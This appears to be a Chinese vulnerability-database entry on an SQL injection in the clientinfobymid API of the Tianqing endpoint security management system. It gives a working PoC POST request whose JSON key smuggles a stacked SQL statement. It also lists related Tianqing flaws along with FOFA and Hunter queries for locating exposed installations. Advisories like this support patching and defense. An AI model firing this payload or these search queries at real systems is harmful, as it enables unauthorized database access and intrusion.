天擎终端安全管理系统clientinfobymid方法存在SQL注入漏洞

漏洞描述

PoC代码

POST /api/terminal/clientinfobymid HTTP/1.1
Content-Type: application/x-www-form-urlencoded

{"mids":{"1 ,:mid_1);select 'aaa' -- aa":"","1":1}}

相关漏洞推荐

• CNVD-2021-32799: 天擎终端安全管理系统前台 SQL 注入漏洞 POC

  2025-09-01 | 天擎终端安全管理系统
  主要影响： 天擎前台SQL注入 FOFA：app="360天擎终端安全管理系统" 进一步利用/验证方法，参考下面 reference 链接

• qianxin-360tianqing-adminlogconf-disclosure: 360新天擎终端安全管理系统信息泄露漏洞 POC

  2025-09-01 | 360新天擎终端安全管理系统
  Fofa: title="360新天擎" Hunter: web.title="360新天擎" ZoomEye: app:"Tianqing term...

• 天擎终端安全管理系统 /rptsvr/upload 路径存在任意文件上传漏洞 无POC

  2024-02-20 | 天擎终端安全管理系统
  天擎终端安全管理系统`<=V6.7.0.4130` 版本的rptsvr接口存在任意文件上传漏洞，可上传恶意至服务器，执行脚本文件。

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...